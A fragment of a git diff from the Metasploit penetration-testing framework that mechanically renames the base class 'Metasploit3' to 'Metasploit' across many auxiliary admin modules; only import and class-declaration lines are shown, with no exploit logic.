b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index 4051e0baa5..304a000cb9 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) diff --git a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb index 25c01c9f28..14098f68c5 100644 --- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb index ec3ce10323..f8af375143 100644 --- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb +++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index 27b931c1a7..c38651085b 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 170a40091e..8b4b10040d 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/misc/wol.rb b/modules/auxiliary/admin/misc/wol.rb index 8afcd0100e..f7ddd95767 100644 --- a/modules/auxiliary/admin/misc/wol.rb +++ b/modules/auxiliary/admin/misc/wol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index 187b8a7d25..4ab1149d86 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index d067729154..13123a6caa 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index b7272a17cc..f2f1753ec0 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb index 27ad860676..2341d62565 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb index dc6b36654f..1e490fcc02 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb index dd90b59eef..5e1b9205ff 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb index f691a81169..b5b334e591 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb index 95bc7a1694..bc1a78853f 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb index bd5d6ade57..ccf1a84775 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb index 9a4493717f..85a969f930 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb index c81ae1b467..8d3cf1cb93 100644 --- a/modules/auxiliary/admin/mssql/mssql_exec.rb +++ b/modules/auxiliary/admin/mssql/mssql_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb index 976ce09e8b..849f52782d 100644 --- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb +++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb index f97100c2e9..80fb25174c 100644 --- a/modules/auxiliary/admin/mssql/mssql_idf.rb +++ b/modules/auxiliary/admin/mssql/mssql_idf.rb @@ -14,7 +14,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index 689739c228..7e51c2b781 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb index 4b4c796a25..13077f1743 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 0ace058218..fcf9e19c06 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_sql_file.rb b/modules/auxiliary/admin/mssql/mssql_sql_file.rb index 8c64f49cca..b1e6347114 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql_file.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mysql/mysql_enum.rb b/modules/auxiliary/admin/mysql/mysql_enum.rb index 5bb0e6830f..16c07d7b66 100644 --- a/modules/auxiliary/admin/mysql/mysql_enum.rb +++ b/modules/auxiliary/admin/mysql/mysql_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::MYSQL diff --git a/modules/auxiliary/admin/mysql/mysql_sql.rb b/modules/auxiliary/admin/mysql/mysql_sql.rb index 56578fa36f..abb02846aa 100644 --- a/modules/auxiliary/admin/mysql/mysql_sql.rb +++ b/modules/auxiliary/admin/mysql/mysql_sql.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL diff --git a/modules/auxiliary/admin/natpmp/natpmp_map.rb b/modules/auxiliary/admin/natpmp/natpmp_map.rb index 731a58e444..cb2dc78458 100644 --- a/modules/auxiliary/admin/natpmp/natpmp_map.rb +++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 8ec139cec0..7210dfac19 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index c9b9faccbb..d9f944d327 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index e33a0db012..0d68f5c206 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'csv' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index ee9efbb905..e5a7d5c7a6 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oraenum.rb b/modules/auxiliary/admin/oracle/oraenum.rb index 44e67f20d0..2d414f5043 100644 --- a/modules/auxiliary/admin/oracle/oraenum.rb +++ b/modules/auxiliary/admin/oracle/oraenum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index 581c65d9ac..c1b9066d2d 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index 94a16f0d72..cfd25721f1 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb index d9355644a7..29d0248f72 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr3.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index c5f9453f72..f52243b6dc 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index a9140ed59d..5932005f8b 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index d7e50deacb..45ccb40946 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::TNS diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index 61c7a66ec0..10079b8013 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TNS diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index d8e837f799..926f063900 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Pop2 diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index fa3abf8d31..2c7f37dddc 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index 9a811c4d1d..9a4f868473 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Postgres diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 684d043437..64ecee853e 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb index 2251e33566..f8353eb35b 100644 --- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb +++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/modicon_command.rb b/modules/auxiliary/admin/scada/modicon_command.rb index 53bf52ea84..119d1e90c9 100644 --- a/modules/auxiliary/admin/scada/modicon_command.rb +++ b/modules/auxiliary/admin/scada/modicon_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/modicon_password_recovery.rb b/modules/auxiliary/admin/scada/modicon_password_recovery.rb index aabbdc4cc3..17cc642db4 100644 --- a/modules/auxiliary/admin/scada/modicon_password_recovery.rb +++ b/modules/auxiliary/admin/scada/modicon_password_recovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb index 4906829d56..e5d774a7b2 100644 --- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb +++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/multi_cip_command.rb b/modules/auxiliary/admin/scada/multi_cip_command.rb index 6abc81f58e..65556a61d9 100644 --- a/modules/auxiliary/admin/scada/multi_cip_command.rb +++ b/modules/auxiliary/admin/scada/multi_cip_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb index 6d0dde4b03..9deda443f7 100644 --- a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb +++ b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::TcpServer diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index b12195b257..dd88da9dd5 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Rex::Platforms::Windows diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 3f85ac29ef..d9cdc28890 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/delete_file.rb b/modules/auxiliary/admin/smb/delete_file.rb index 417aea54d2..edf8bf69cc 100644 --- a/modules/auxiliary/admin/smb/delete_file.rb +++ b/modules/auxiliary/admin/smb/delete_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/download_file.rb b/modules/auxiliary/admin/smb/download_file.rb index d6aa05a4b6..36b9114390 100644 --- a/modules/auxiliary/admin/smb/download_file.rb +++ b/modules/auxiliary/admin/smb/download_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index 53e52f66e8..f27d5d81fe 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 77c3daa7f0..969095b94e 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client::Psexec include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index ed89e046a5..ddec2b10e9 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client::Psexec diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index e0c7b914b6..044d27065e 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index b52f54f8a1..85449a0b61 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 24d11c9978..33c6f753bd 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC diff --git a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb index 9618c5eed9..e4a663be2e 100644 --- a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb +++ b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Rex::Proto::TFTP include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index 5e63df3926..d30bc19800 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/upnp/soap_portmapping.rb b/modules/auxiliary/admin/upnp/soap_portmapping.rb index 4ddc743e52..d11e355060 100644 --- a/modules/auxiliary/admin/upnp/soap_portmapping.rb +++ b/modules/auxiliary/admin/upnp/soap_portmapping.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize diff --git a/modules/auxiliary/admin/vmware/poweroff_vm.rb b/modules/auxiliary/admin/vmware/poweroff_vm.rb index 08d8294543..b7541841b1 100644 --- a/modules/auxiliary/admin/vmware/poweroff_vm.rb +++ b/modules/auxiliary/admin/vmware/poweroff_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/poweron_vm.rb b/modules/auxiliary/admin/vmware/poweron_vm.rb index 